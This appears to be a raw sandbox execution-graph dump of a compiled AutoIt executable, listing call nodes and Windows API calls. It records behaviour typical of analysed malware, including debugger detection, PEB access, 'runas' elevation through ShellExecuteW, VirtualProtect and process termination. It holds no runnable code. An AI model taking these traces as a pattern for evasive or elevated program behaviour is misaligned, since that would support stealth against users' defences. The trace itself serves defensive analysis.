104671 ed8047 59 API calls 104666->104671 104667 ed3887 104667->104641 104668 ed3891 104667->104668 104669 ef2efd _W_store_winword 60 API calls 104668->104669 104670 ed389c 104669->104670 104670->104647 104672 ed38a6 104670->104672 104673 f0d24f 104671->104673 104674 ef2efd _W_store_winword 60 API calls 104672->104674 104675 ed3ed0 59 API calls 104673->104675 104676 ed38b1 104674->104676 104677 f0d25c 104675->104677 104676->104651 104678 ed38bb 104676->104678 104677->104677 104679 ef2efd _W_store_winword 60 API calls 104678->104679 104680 ed38c6 104679->104680 104680->104666 104681 ed3907 104680->104681 104683 ed3ed0 59 API calls 104680->104683 104681->104666 104682 ed3914 104681->104682 104903 ed92ce 104682->104903 104685 ed38ea 104683->104685 104687 ed8047 59 API calls 104685->104687 104688 ed38f8 104687->104688 104690 ed3ed0 59 API calls 104688->104690 104690->104681 104693 ed928a 59 API calls 104695 ed394f 104693->104695 104694 ed8ee0 60 API calls 104694->104695 104695->104693 104695->104694 104696 ed3ed0 59 API calls 104695->104696 104697 ed3995 Mailbox 104695->104697 104696->104695 104697->104567 104699 ed7292 __ftell_nolock 104698->104699 104700 f0ea22 _memset 104699->104700 104701 ed72ab 104699->104701 104703 f0ea3e 7574D0D0 104700->104703 104702 ed4750 60 API calls 104701->104702 104704 ed72b4 104702->104704 104705 f0ea8d 104703->104705 105779 ef0791 104704->105779 104707 ed7bcc 59 API calls 104705->104707 104709 f0eaa2 104707->104709 104709->104709 104711 ed72c9 105797 ed686a 104711->105797 104715 ee093a __ftell_nolock 104714->104715 106048 ed6d80 104715->106048 104717 ee093f 104728 ed3c14 104717->104728 106059 ee119e 90 API calls 104717->106059 104719 ee094c 104719->104728 106060 ee3ee7 92 API calls Mailbox 104719->106060 104721 ee0955 104722 ee0959 GetFullPathNameW 104721->104722 104721->104728 104723 ed7bcc 59 API calls 104722->104723 104724 ee0985 104723->104724 104725 ed7bcc 59 API calls 104724->104725 104726 ee0992 104725->104726 104727 ed7bcc 59 
API calls 104726->104727 104729 f14cab _wcscat 104726->104729 104727->104728 104728->104576 104728->104584 104731 f0d261 104730->104731 104732 ed3ab0 LoadImageW RegisterClassExW 104730->104732 106102 ed47a0 LoadImageW EnumResourceNamesW 104731->106102 106098 ed3041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 104732->106098 104736 f0d26a 104737 ed39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104737->104592 104739 ed4375 _memset 104738->104739 106103 ed4182 104739->106103 104742 ed43fa 104744 ed4414 Shell_NotifyIconW 104742->104744 104745 ed4430 Shell_NotifyIconW 104742->104745 104746 ed4422 104744->104746 104745->104746 106107 ed407c 104746->106107 104750 f14cc3 104749->104750 104762 ee09f5 104749->104762 106265 f39e4a 90 API calls 4 library calls 104750->106265 104752 ee0cfa 104752->104598 104755 ee0ee4 104755->104752 104756 ee0ef1 104755->104756 106263 ee1093 332 API calls Mailbox 104756->106263 104757 ee0a4b PeekMessageW 104817 ee0a05 Mailbox 104757->104817 104761 ee0ce4 104761->104752 106262 ee1070 10 API calls Mailbox 104761->106262 104762->104817 106266 ed9e5d 60 API calls 104762->106266 106267 f26349 332 API calls 104762->106267 104763 f14e81 Sleep 104763->104817 104768 f14d50 TranslateAcceleratorW 104770 ee0e43 PeekMessageW 104768->104770 104768->104817 104769 ee0ea5 TranslateMessage DispatchMessageW 104769->104770 104770->104817 104771 f1581f WaitForSingleObject 104774 f1583c GetExitCodeProcess CloseHandle 104771->104774 104771->104817 104773 ee0d13 timeGetTime 104773->104817 104810 ee0f95 104774->104810 104775 ee0e5f Sleep 104811 ee0e70 Mailbox 104775->104811 104776 ed8047 59 API calls 104776->104817 104777 ed7667 59 API calls 104777->104811 104778 f15af8 Sleep 104778->104811 104780 ef0db6 59 API calls Mailbox 104780->104817 104782 ef049f timeGetTime 104782->104811 104783 ee0f4e timeGetTime 106264 ed9e5d 60 API calls 104783->106264 104786 f15b8f GetExitCodeProcess 104789 f15ba5 WaitForSingleObject 104786->104789 104790 f15bbb 
CloseHandle 104786->104790 104788 edb7dd 110 API calls 104788->104811 104789->104790 104789->104817 104790->104811 104792 edb73c 305 API calls 104792->104817 104794 f55f25 111 API calls 104794->104811 104795 ed9e5d 60 API calls 104795->104817 104796 f15874 104796->104810 104797 f15078 Sleep 104797->104817 104798 f15c17 Sleep 104798->104817 104800 ed7de1 59 API calls 104800->104811 104804 ed9ea0 305 API calls 104804->104817 104810->104598 104811->104777 104811->104782 104811->104786 104811->104788 104811->104794 104811->104796 104811->104797 104811->104798 104811->104800 104811->104810 104811->104817 106292 f32408 60 API calls 104811->106292 106293 ed9e5d 60 API calls 104811->106293 106294 ed89b3 69 API calls Mailbox 104811->106294 106295 edb73c 332 API calls 104811->106295 106296 f264da 60 API calls 104811->106296 106297 f35244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104811->106297 106298 f33c55 66 API calls Mailbox 104811->106298 104812 ed7de1 59 API calls 104812->104817 104813 f39e4a 90 API calls 104813->104817 104815 ed84c0 69 API calls 104815->104817 104816 ed9c90 59 API calls Mailbox 104816->104817 104817->104757 104817->104761 104817->104763 104817->104768 104817->104769 104817->104770 104817->104771 104817->104773 104817->104775 104817->104776 104817->104778 104817->104780 104817->104783 104817->104792 104817->104795 104817->104804 104817->104810 104817->104811 104817->104812 104817->104813 104817->104815 104817->104816 104819 ed89b3 69 API calls 104817->104819 104820 f155d5 VariantClear 104817->104820 104821 f2617e 59 API calls Mailbox 104817->104821 104822 f1566b VariantClear 104817->104822 104823 f15419 VariantClear 104817->104823 104824 f26e8f 59 API calls 104817->104824 104825 ed8cd4 59 API calls Mailbox 104817->104825 106130 ede6a0 104817->106130 106161 edf460 104817->106161 106180 edfce0 104817->106180 106260 ede420 332 API calls 104817->106260 106261 ed31ce IsDialogMessageW GetClassLongW 104817->106261 
106268 f56018 59 API calls 104817->106268 106269 f39a15 59 API calls Mailbox 104817->106269 106270 f2d4f2 59 API calls 104817->106270 106271 ed9837 104817->106271 106289 f260ef 59 API calls 2 library calls 104817->106289 106290 ed8401 59 API calls 104817->106290 106291 ed82df 59 API calls Mailbox 104817->106291 104819->104817 104820->104817 104821->104817 104822->104817 104823->104817 104824->104817 104825->104817 104826->104604 104827->104576 104828->104588 104830 f0ec6b 104829->104830 104831 ed7b40 104829->104831 106609 f27bdb 59 API calls _memmove 104830->106609 106603 ed7a51 104831->106603 104834 ed7b4c 104834->104613 104835 f0ec75 104836 ed8047 59 API calls 104835->104836 104837 f0ec7d Mailbox 104836->104837 104839 ed3d3e __ftell_nolock 104838->104839 104840 ed7bcc 59 API calls 104839->104840 104845 ed3ea4 Mailbox 104839->104845 104842 ed3d70 104840->104842 104850 ed3da6 Mailbox 104842->104850 104964 ed79f2 104842->104964 104843 ed79f2 59 API calls 104843->104850 104844 ed3e77 104844->104845 104846 ed7de1 59 API calls 104844->104846 104845->104621 104848 ed3e98 104846->104848 104847 ed7de1 59 API calls 104847->104850 104849 ed3f74 59 API calls 104848->104849 104849->104845 104850->104843 104850->104844 104850->104845 104850->104847 104851 ed3f74 59 API calls 104850->104851 104851->104850 104967 ed4bb5 104852->104967 104857 ed4e08 LoadLibraryExW 104977 ed4b6a 104857->104977 104858 f0d8e6 104859 ed4e4a 84 API calls 104858->104859 104861 f0d8ed 104859->104861 104863 ed4b6a 3 API calls 104861->104863 104865 f0d8f5 104863->104865 105003 ed4f0b 104865->105003 104866 ed4e2f 104866->104865 104867 ed4e3b 104866->104867 104868 ed4e4a 84 API calls 104867->104868 104870 ed37d4 104868->104870 104870->104628 104870->104629 104873 f0d91c 105011 ed4ec7 104873->105011 104875 f0d929 104877 ed37ef 104876->104877 104878 ed8052 104876->104878 104880 ed928a 104877->104880 105437 ed7f77 59 API calls 2 library calls 104878->105437 104881 ef0db6 Mailbox 59 API calls 104880->104881 
104882 ed37fb 104881->104882 104882->104642 104884 ed84cb 104883->104884 104885 ed84f2 104884->104885 105438 ed89b3 69 API calls Mailbox 104884->105438 104885->104646 104888 ed3eda 104887->104888 104889 ed3ef3 104887->104889 104891 ed8047 59 API calls 104888->104891 104890 ed7bcc 59 API calls 104889->104890 104892 ed3879 104890->104892 104891->104892 104893 ef2efd 104892->104893 104894 ef2f7e 104893->104894 104895 ef2f09 104893->104895 105441 ef2f90 60 API calls 3 library calls 104894->105441 104902 ef2f2e 104895->104902 105439 ef8b28 58 API calls __getptd_noexit 104895->105439 104898 ef2f8b 104898->104667 104899 ef2f15 105440 ef8db6 9 API calls ___crtsetenv 104899->105440 104901 ef2f20 104901->104667 104902->104667 104904 ed92d6 104903->104904 104905 ef0db6 Mailbox 59 API calls 104904->104905 104906 ed92e4 104905->104906 104907 ed3924 104906->104907 105442 ed91fc 59 API calls Mailbox 104906->105442 104909 ed9050 104907->104909 105443 ed9160 104909->105443 104911 ed905f 104912 ef0db6 Mailbox 59 API calls 104911->104912 104913 ed3932 104911->104913 104912->104913 104914 ed8ee0 104913->104914 104915 f0f17c 104914->104915 104917 ed8ef7 104914->104917 104915->104917 105453 ed8bdb 59 API calls Mailbox 104915->105453 104918 ed8ff8 104917->104918 104919 ed9040 104917->104919 104922 ed8fff 104917->104922 104921 ef0db6 Mailbox 59 API calls 104918->104921 105452 ed9d3c 60 API calls Mailbox 104919->105452 104921->104922 104922->104695 104924 ed4ee5 85 API calls 104923->104924 104925 f395ca 104924->104925 105454 f39734 104925->105454 104928 ed4f0b 74 API calls 104929 f395f7 104928->104929 104930 ed4f0b 74 API calls 104929->104930 104931 f39607 104930->104931 104932 ed4f0b 74 API calls 104931->104932 104933 f39622 104932->104933 104934 ed4f0b 74 API calls 104933->104934 104935 f3963d 104934->104935 104936 ed4ee5 85 API calls 104935->104936 104937 f39654 104936->104937 104938 ef571c _W_store_winword 58 API calls 104937->104938 104939 f3965b 104938->104939 104940 ef571c 
_W_store_winword 58 API calls 104939->104940 104941 f39665 104940->104941 104942 ed4f0b 74 API calls 104941->104942 104943 f39679 104942->104943 104944 f39109 GetSystemTimeAsFileTime 104943->104944 104945 f3968c 104944->104945 104946 f396a1 104945->104946 104947 f396b6 104945->104947 104948 ef2d55 _free 58 API calls 104946->104948 104949 f3971b 104947->104949 104950 f396bc 104947->104950 104952 f396a7 104948->104952 104951 ef2d55 _free 58 API calls 104949->104951 105460 f38b06 104950->105460 104954 f0d186 104951->104954 104955 ef2d55 _free 58 API calls 104952->104955 104954->104632 104958 ed4e4a 104954->104958 104955->104954 104957 ef2d55 _free 58 API calls 104957->104954 104959 ed4e5b 104958->104959 104960 ed4e54 104958->104960 104962 ed4e7b FreeLibrary 104959->104962 104963 ed4e6a 104959->104963 104961 ef53a6 __fcloseall 83 API calls 104960->104961 104961->104959 104962->104963 104963->104632 104965 ed7e4f 59 API calls 104964->104965 104966 ed79fd 104965->104966 104966->104842 105016 ed4c03 104967->105016 104970 ed4bdc 104972 ed4bec FreeLibrary 104970->104972 104973 ed4bf5 104970->104973 104971 ed4c03 2 API calls 104971->104970 104972->104973 104974 ef525b 104973->104974 105020 ef5270 104974->105020 104976 ed4dfc 104976->104857 104976->104858 105177 ed4c36 104977->105177 104980 ed4c36 2 API calls 104983 ed4b8f 104980->104983 104981 ed4baa 104984 ed4c70 104981->104984 104982 ed4ba1 FreeLibrary 104982->104981 104983->104981 104983->104982 104985 ef0db6 Mailbox 59 API calls 104984->104985 104986 ed4c85 104985->104986 104987 ed522e 59 API calls 104986->104987 104988 ed4c91 _memmove 104987->104988 104990 ed4d89 104988->104990 104991 ed4dc1 104988->104991 104994 ed4ccc 104988->104994 104989 ed4ec7 69 API calls 104999 ed4cd5 104989->104999 105181 ed4e89 CreateStreamOnHGlobal 104990->105181 105192 f3991b 95 API calls 104991->105192 104994->104989 104995 ed4f0b 74 API calls 104995->104999 104997 ed4d69 104997->104866 104998 f0d8a7 105000 ed4ee5 85 API calls 104998->105000 
104999->104995 104999->104997 104999->104998 105187 ed4ee5 104999->105187 105001 f0d8bb 105000->105001 105002 ed4f0b 74 API calls 105001->105002 105002->104997 105004 ed4f1d 105003->105004 105007 f0d9cd 105003->105007 105216 ef55e2 105004->105216 105008 f39109 105414 f38f5f 105008->105414 105010 f3911f 105010->104873 105012 f0d990 105011->105012 105013 ed4ed6 105011->105013 105419 ef5c60 105013->105419 105015 ed4ede 105015->104875 105017 ed4bd0 105016->105017 105018 ed4c0c LoadLibraryA 105016->105018 105017->104970 105017->104971 105018->105017 105019 ed4c1d GetProcAddress 105018->105019 105019->105017 105022 ef527c _flsall 105020->105022 105021 ef528f 105069 ef8b28 58 API calls __getptd_noexit 105021->105069 105022->105021 105024 ef52c0 105022->105024 105039 f004e8 105024->105039 105025 ef5294 105070 ef8db6 9 API calls ___crtsetenv 105025->105070 105028 ef52c5 105029 ef52ce 105028->105029 105030 ef52db 105028->105030 105071 ef8b28 58 API calls __getptd_noexit 105029->105071 105032 ef5305 105030->105032 105033 ef52e5 105030->105033 105054 f00607 105032->105054 105072 ef8b28 58 API calls __getptd_noexit 105033->105072 105035 ef529f _flsall @_EH4_CallFilterFunc@8 105035->104976 105040 f004f4 _flsall 105039->105040 105041 ef9c0b __lock 58 API calls 105040->105041 105042 f00502 105041->105042 105043 f0057d 105042->105043 105049 ef9c93 __mtinitlocknum 58 API calls 105042->105049 105052 f00576 105042->105052 105077 ef6c50 59 API calls __lock 105042->105077 105078 ef6cba RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 105042->105078 105079 ef881d 58 API calls 2 library calls 105043->105079 105046 f00584 105046->105052 105080 ef9e2b InitializeCriticalSectionAndSpinCount 105046->105080 105047 f005f3 _flsall 105047->105028 105049->105042 105051 f005aa RtlEnterCriticalSection 105051->105052 105074 f005fe 105052->105074 105062 f00627 __wopenfile 105054->105062 105055 f00641 105085 ef8b28 58 API calls __getptd_noexit 105055->105085 105057 f00646 105086 ef8db6 9 API 
calls ___crtsetenv 105057->105086 105059 f0085f 105082 f085a1 105059->105082 105060 ef5310 105073 ef5332 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105060->105073 105062->105055 105068 f007fc 105062->105068 105087 ef37cb 60 API calls 2 library calls 105062->105087 105064 f007f5 105064->105068 105088 ef37cb 60 API calls 2 library calls 105064->105088 105066 f00814 105066->105068 105089 ef37cb 60 API calls 2 library calls 105066->105089 105068->105055 105068->105059 105069->105025 105070->105035 105071->105035 105072->105035 105073->105035 105081 ef9d75 RtlLeaveCriticalSection 105074->105081 105076 f00605 105076->105047 105077->105042 105078->105042 105079->105046 105080->105051 105081->105076 105090 f07d85 105082->105090 105084 f085ba 105084->105060 105085->105057 105086->105060 105087->105064 105088->105066 105089->105068 105091 f07d91 _flsall 105090->105091 105092 f07da7 105091->105092 105095 f07ddd 105091->105095 105174 ef8b28 58 API calls __getptd_noexit 105092->105174 105094 f07dac 105175 ef8db6 9 API calls ___crtsetenv 105094->105175 105101 f07e4e 105095->105101 105098 f07df9 105176 f07e22 RtlLeaveCriticalSection __unlock_fhandle 105098->105176 105100 f07db6 _flsall 105100->105084 105102 f07e6e 105101->105102 105103 ef44ea __wsopen_nolock 58 API calls 105102->105103 105106 f07e8a 105103->105106 105104 ef8dc6 __invoke_watson 8 API calls 105105 f085a0 105104->105105 105108 f07d85 __wsopen_helper 103 API calls 105105->105108 105107 f07ec4 105106->105107 105115 f07ee7 105106->105115 105173 f07fc1 105106->105173 105109 ef8af4 __close 58 API calls 105107->105109 105110 f085ba 105108->105110 105111 f07ec9 105109->105111 105110->105098 105112 ef8b28 ___crtsetenv 58 API calls 105111->105112 105113 f07ed6 105112->105113 105116 ef8db6 ___crtsetenv 9 API calls 105113->105116 105114 f07fa5 105117 ef8af4 __close 58 API calls 105114->105117 105115->105114 105123 f07f83 105115->105123 105118 f07ee0 105116->105118 105119 f07faa 105117->105119 105118->105098 
Execution Graph: the rendered control-flow graph does not survive text extraction; the node/edge listing (numeric node IDs and `a->b` edges) has been omitted. The only information recoverable from it is the set of function and API names attached to graph nodes, grouped here by role:

- CRT file-handle and stream wrappers: ___createFile (GetModuleHandleW, GetProcAddress, CreateFileW), GetFileType, ReadFile, ReadConsoleW, WriteFile, WriteConsoleW, CloseHandle, GetLastError, GetConsoleMode, GetConsoleCP, MultiByteToWideChar, WideCharToMultiByte, SetFilePointerEx, GetSystemTimeAsFileTime, RtlEnterCriticalSection / RtlLeaveCriticalSection, InitializeCriticalSectionAndSpinCount, plus internal helpers (__alloc_osfhnd, __set_osfhnd, __free_osfhnd, __read_nolock, __write_nolock, __lseeki64_nolock, __chsize_nolock, __close_nolock, __fflush_nolock, __flsbuf, __lock_file, __wfsopen, __dosmaperr, ___crtsetenv, __getptd_noexit).
- Dynamic import and PE resource access: LoadLibraryA, GetProcAddress, FindResourceExW, LoadResource, SizeofResource, LockResource.
- Process, UI and shell initialization: GetStdHandle, OleInitialize, CreateThread, RegisterClipboardFormatW, LoadIconW, DestroyCursor, SetCurrentDirectoryW, GetLongPathNameW, CharUpperBuffW, GetStringTypeW.
ef0db6 Mailbox 59 API calls 106687->106690 106705 f39ae7 60 API calls 106688->106705 106691 eefdb6 106690->106691 106691->106638 106692 f2577a 106693->106645 106694->106647 106706 f371ed 65 API calls 106694->106706 106696 ed7667 59 API calls 106695->106696 106697 eeffe7 106696->106697 106698 ed7667 59 API calls 106697->106698 106699 eeffef 106698->106699 106700 ed7667 59 API calls 106699->106700 106701 eeff3b 106700->106701 106701->106651 106703 ed7667 59 API calls 106702->106703 106704 ee5aa5 106703->106704 106704->106665 106705->106692 106707 ed1016 106712 ed4974 106707->106712 106710 ef2d40 __cinit 67 API calls 106711 ed1025 106710->106711 106713 ef0db6 Mailbox 59 API calls 106712->106713 106714 ed497c 106713->106714 106715 ed101b 106714->106715 106719 ed4936 106714->106719 106715->106710 106720 ed493f 106719->106720 106721 ed4951 106719->106721 106722 ef2d40 __cinit 67 API calls 106720->106722 106723 ed49a0 106721->106723 106722->106721 106724 ed7667 59 API calls 106723->106724 106725 ed49b8 GetVersionExW 106724->106725 106726 ed7bcc 59 API calls 106725->106726 106727 ed49fb 106726->106727 106728 ed7d2c 59 API calls 106727->106728 106733 ed4a28 106727->106733 106729 ed4a1c 106728->106729 106730 ed7726 59 API calls 106729->106730 106730->106733 106731 ed4a93 GetCurrentProcess IsWow64Process 106732 ed4aac 106731->106732 106735 ed4b2b GetSystemInfo 106732->106735 106736 ed4ac2 106732->106736 106733->106731 106734 f0d864 106733->106734 106737 ed4af8 106735->106737 106747 ed4b37 106736->106747 106737->106715 106740 ed4b1f GetSystemInfo 106742 ed4ae9 106740->106742 106741 ed4ad4 106743 ed4b37 2 API calls 106741->106743 106742->106737 106745 ed4aef FreeLibrary 106742->106745 106744 ed4adc GetNativeSystemInfo 106743->106744 106744->106742 106745->106737 106748 ed4ad0 106747->106748 106749 ed4b40 LoadLibraryA 106747->106749 106748->106740 106748->106741 106749->106748 106750 ed4b51 GetProcAddress 106749->106750 106750->106748 106751 f0fdfc 106790 edab30 Mailbox _memmove 
106751->106790 106755 ef0db6 59 API calls Mailbox 106755->106790 106758 edb525 106818 f39e4a 90 API calls 4 library calls 106758->106818 106759 ef0db6 59 API calls Mailbox 106780 ed9f37 Mailbox 106759->106780 106760 f10055 106817 f39e4a 90 API calls 4 library calls 106760->106817 106764 edb475 106768 ed8047 59 API calls 106764->106768 106765 f10064 106773 eda057 106768->106773 106769 edb47a 106769->106760 106779 f109e5 106769->106779 106770 ed8047 59 API calls 106770->106780 106772 ed7667 59 API calls 106772->106780 106774 f26e8f 59 API calls 106774->106780 106775 ed7de1 59 API calls 106775->106790 106776 ef2d40 67 API calls __cinit 106776->106780 106777 f109d6 106823 f39e4a 90 API calls 4 library calls 106777->106823 106824 f39e4a 90 API calls 4 library calls 106779->106824 106780->106759 106780->106760 106780->106764 106780->106769 106780->106770 106780->106772 106780->106773 106780->106774 106780->106776 106780->106777 106781 eda55a 106780->106781 106806 edc8c0 332 API calls 2 library calls 106780->106806 106807 edb900 60 API calls Mailbox 106780->106807 106822 f39e4a 90 API calls 4 library calls 106781->106822 106784 edb2b6 106811 edf6a3 332 API calls 106784->106811 106785 ed9ea0 332 API calls 106785->106790 106787 f1086a 106820 ed9c90 59 API calls Mailbox 106787->106820 106789 f10878 106821 f39e4a 90 API calls 4 library calls 106789->106821 106790->106755 106790->106758 106790->106773 106790->106775 106790->106780 106790->106784 106790->106785 106790->106787 106790->106789 106792 f1085c 106790->106792 106793 edb21c 106790->106793 106797 f26e8f 59 API calls 106790->106797 106800 f4df23 106790->106800 106803 f4df37 106790->106803 106808 ed9c90 59 API calls Mailbox 106790->106808 106812 f4c193 86 API calls 2 library calls 106790->106812 106813 f4c2e0 97 API calls Mailbox 106790->106813 106814 f37956 59 API calls Mailbox 106790->106814 106815 f4bc6b 332 API calls Mailbox 106790->106815 106816 f2617e 59 API calls Mailbox 106790->106816 106792->106773 106819 f2617e 
59 API calls Mailbox 106792->106819 106809 ed9d3c 60 API calls Mailbox 106793->106809 106795 edb22d 106810 ed9d3c 60 API calls Mailbox 106795->106810 106797->106790 106825 f4cadd 106800->106825 106802 f4df33 106802->106790 106804 f4cadd 131 API calls 106803->106804 106805 f4df47 106804->106805 106805->106790 106806->106780 106807->106780 106808->106790 106809->106795 106810->106784 106811->106758 106812->106790 106813->106790 106814->106790 106815->106790 106816->106790 106817->106765 106818->106792 106819->106773 106820->106792 106821->106792 106822->106773 106823->106779 106824->106773 106826 ed9837 85 API calls 106825->106826 106827 f4cb1a 106826->106827 106850 f4cb61 Mailbox 106827->106850 106863 f4d7a5 106827->106863 106829 f4cdb9 106830 f4cf2e 106829->106830 106834 f4cdc7 106829->106834 106902 f4d8c8 93 API calls Mailbox 106830->106902 106833 f4cf3d 106833->106834 106836 f4cf49 106833->106836 106876 f4c96e 106834->106876 106835 ed9837 85 API calls 106854 f4cbb2 Mailbox 106835->106854 106836->106850 106841 f4ce00 106891 ef0c08 106841->106891 106844 f4ce33 106847 ed92ce 59 API calls 106844->106847 106845 f4ce1a 106897 f39e4a 90 API calls 4 library calls 106845->106897 106849 f4ce3f 106847->106849 106848 f4ce25 GetCurrentProcess TerminateProcess 106848->106844 106851 ed9050 59 API calls 106849->106851 106850->106802 106852 f4ce55 106851->106852 106862 f4ce7c 106852->106862 106898 ed8d40 59 API calls Mailbox 106852->106898 106854->106829 106854->106835 106854->106850 106895 f4fbce 59 API calls 2 library calls 106854->106895 106896 f4cfdf 61 API calls 2 library calls 106854->106896 106855 f4cfa4 106855->106850 106859 f4cfb8 FreeLibrary 106855->106859 106856 f4ce6b 106899 f4d649 108 API calls _free 106856->106899 106859->106850 106862->106855 106900 ed8d40 59 API calls Mailbox 106862->106900 106901 ed9d3c 60 API calls Mailbox 106862->106901 106903 f4d649 108 API calls _free 106862->106903 106864 ed7e4f 59 API calls 106863->106864 106865 f4d7c0 CharLowerBuffW 
106864->106865 106904 f2f167 106865->106904 106869 ed7667 59 API calls 106870 f4d7f9 106869->106870 106871 ed784b 59 API calls 106870->106871 106872 f4d810 106871->106872 106874 ed7d2c 59 API calls 106872->106874 106873 f4d858 Mailbox 106873->106854 106875 f4d81c Mailbox 106874->106875 106875->106873 106911 f4cfdf 61 API calls 2 library calls 106875->106911 106877 f4c989 106876->106877 106881 f4c9de 106876->106881 106878 ef0db6 Mailbox 59 API calls 106877->106878 106880 f4c9ab 106878->106880 106879 ef0db6 Mailbox 59 API calls 106879->106880 106880->106879 106880->106881 106882 f4da50 106881->106882 106883 f4dc79 Mailbox 106882->106883 106890 f4da73 _strcat _wcscpy __NMSG_WRITE 106882->106890 106883->106841 106884 ed9be6 59 API calls 106884->106890 106885 ed9b3c 59 API calls 106885->106890 106886 ed9b98 59 API calls 106886->106890 106887 ef571c 58 API calls _W_store_winword 106887->106890 106888 ed9837 85 API calls 106888->106890 106890->106883 106890->106884 106890->106885 106890->106886 106890->106887 106890->106888 106914 f35887 61 API calls 2 library calls 106890->106914 106892 ef0c1d 106891->106892 106893 ef0cb5 VirtualProtect 106892->106893 106894 ef0c83 106892->106894 106893->106894 106894->106844 106894->106845 106895->106854 106896->106854 106897->106848 106898->106856 106899->106862 106900->106862 106901->106862 106902->106833 106903->106862 106905 f2f192 __NMSG_WRITE 106904->106905 106906 f2f1c7 106905->106906 106907 f2f278 106905->106907 106910 f2f1d1 106905->106910 106906->106910 106912 ed78c4 61 API calls 106906->106912 106907->106910 106913 ed78c4 61 API calls 106907->106913 106910->106869 106910->106875 106911->106873 106912->106906 106913->106907 106914->106890 106915 ed3633 106916 ed366a 106915->106916 106917 ed3688 106916->106917 106918 ed36e7 106916->106918 106954 ed36e5 106916->106954 106919 ed374b PostQuitMessage 106917->106919 106920 ed3695 106917->106920 106922 ed36ed 106918->106922 106923 f0d0cc 106918->106923 106957 ed36d8 106919->106957 
106925 f0d154 106920->106925 106926 ed36a0 106920->106926 106921 ed36ca NtdllDefWindowProc_W 106921->106957 106927 ed3715 SetTimer RegisterClipboardFormatW 106922->106927 106928 ed36f2 106922->106928 106964 ee1070 10 API calls Mailbox 106923->106964 106969 f32527 71 API calls _memset 106925->106969 106930 ed36a8 106926->106930 106931 ed3755 106926->106931 106932 ed373e CreatePopupMenu 106927->106932 106927->106957 106934 ed36f9 KillTimer 106928->106934 106935 f0d06f 106928->106935 106929 f0d0f3 106965 ee1093 332 API calls Mailbox 106929->106965 106937 ed36b3 106930->106937 106942 f0d139 106930->106942 106962 ed44a0 64 API calls _memset 106931->106962 106932->106957 106960 ed443a Shell_NotifyIconW _memset 106934->106960 106939 f0d074 106935->106939 106940 f0d0a8 MoveWindow 106935->106940 106943 ed36be 106937->106943 106944 f0d124 106937->106944 106947 f0d097 SetFocus 106939->106947 106948 f0d078 106939->106948 106940->106957 106942->106921 106968 f27c36 59 API calls Mailbox 106942->106968 106943->106921 106966 ed443a Shell_NotifyIconW _memset 106943->106966 106967 f32d36 81 API calls _memset 106944->106967 106945 f0d166 106945->106921 106945->106957 106946 ed3764 106946->106957 106947->106957 106948->106943 106952 f0d081 106948->106952 106949 ed370c 106961 ed3114 DeleteObject DestroyWindow Mailbox 106949->106961 106963 ee1070 10 API calls Mailbox 106952->106963 106954->106921 106958 f0d118 106959 ed434a 68 API calls 106958->106959 106959->106954 106960->106949 106961->106957 106962->106946 106963->106957 106964->106929 106965->106943 106966->106958 106967->106946 106968->106954 106969->106945 106970 116f208 106984 116ce28 106970->106984 106972 116f308 106988 116f0f8 106972->106988 106985 116ce3c 106984->106985 106991 1170358 GetPEB 106985->106991 106987 116d4b3 106987->106972 106989 116f101 Sleep 106988->106989 106990 116f10f 106989->106990 106992 1170382 106991->106992 106992->106987 106993 f1416f 106997 f25fe6 106993->106997 106995 f1417a 106996 f25fe6 86 API 
calls 106995->106996 106996->106995 107003 f26020 106997->107003 107005 f25ff3 106997->107005 106998 f26022 107009 ed9328 85 API calls Mailbox 106998->107009 107000 f26027 107001 ed9837 85 API calls 107000->107001 107002 f2602e 107001->107002 107004 ed7b2e 59 API calls 107002->107004 107003->106995 107004->107003 107005->106998 107005->107000 107005->107003 107006 f2601a 107005->107006 107008 ed95a0 59 API calls _wcsstr 107006->107008 107008->107003 107009->107000

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00ED3B68
                                                                            • IsDebuggerPresent.KERNEL32 ref: 00ED3B7A
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F952F8,00F952E0,?,?), ref: 00ED3BEB
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                              • Part of subcall function 00EE092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00ED3C14,00F952F8,?,?,?), ref: 00EE096E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED3C6F
                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F87770,00000010), ref: 00F0D281
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00F952F8,?,?,?), ref: 00F0D2B9
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F84260,00F952F8,?,?,?), ref: 00F0D33F
                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F0D346
                                                                              • Part of subcall function 00ED3A46: GetSysColorBrush.USER32(0000000F), ref: 00ED3A50
                                                                              • Part of subcall function 00ED3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00ED3A5F
                                                                              • Part of subcall function 00ED3A46: LoadIconW.USER32(00000063), ref: 00ED3A76
                                                                              • Part of subcall function 00ED3A46: LoadIconW.USER32(000000A4), ref: 00ED3A88
                                                                              • Part of subcall function 00ED3A46: LoadIconW.USER32(000000A2), ref: 00ED3A9A
                                                                              • Part of subcall function 00ED3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00ED3AC0
                                                                              • Part of subcall function 00ED3A46: RegisterClassExW.USER32(?), ref: 00ED3B16
                                                                              • Part of subcall function 00ED39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00ED3A03
                                                                              • Part of subcall function 00ED39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00ED3A24
                                                                              • Part of subcall function 00ED39D5: ShowWindow.USER32(00000000,?,?), ref: 00ED3A38
                                                                              • Part of subcall function 00ED39D5: ShowWindow.USER32(00000000,?,?), ref: 00ED3A41
                                                                              • Part of subcall function 00ED434A: _memset.LIBCMT ref: 00ED4370
